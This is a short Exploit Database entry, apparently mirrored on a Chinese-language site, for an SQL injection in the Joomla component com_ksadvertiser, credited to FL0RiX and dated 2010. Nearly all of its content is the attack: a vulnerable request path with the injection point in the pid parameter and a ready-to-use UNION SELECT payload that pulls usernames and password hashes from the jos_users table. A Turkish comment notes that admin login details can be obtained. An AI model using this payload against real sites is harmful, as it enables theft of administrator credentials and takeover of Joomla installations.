Joomla! Component com_ksadvertiser – SQL Injection

• Exploit Database
• 98 阅读

• 作者： FL0RiX
  日期： 2010-01-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11068/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18

  ######################################################################## #Joomla Component com_ksadvertiser SQL Injection Vulnerability ######################################################################## # Author :FL0RiX # # Name : com_ksadvertiser # # Bug Type : SQL Injection # # Infection: Admin login bilgileri alinabilir. # # Demo Vuln : # # http://server/index.php?option=com_ksadvertiser&pid=[EXPLOIT]&task=showcats # #EXPLOIT : null/**/union/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14/**/from/**/jos_users-- ########################################################################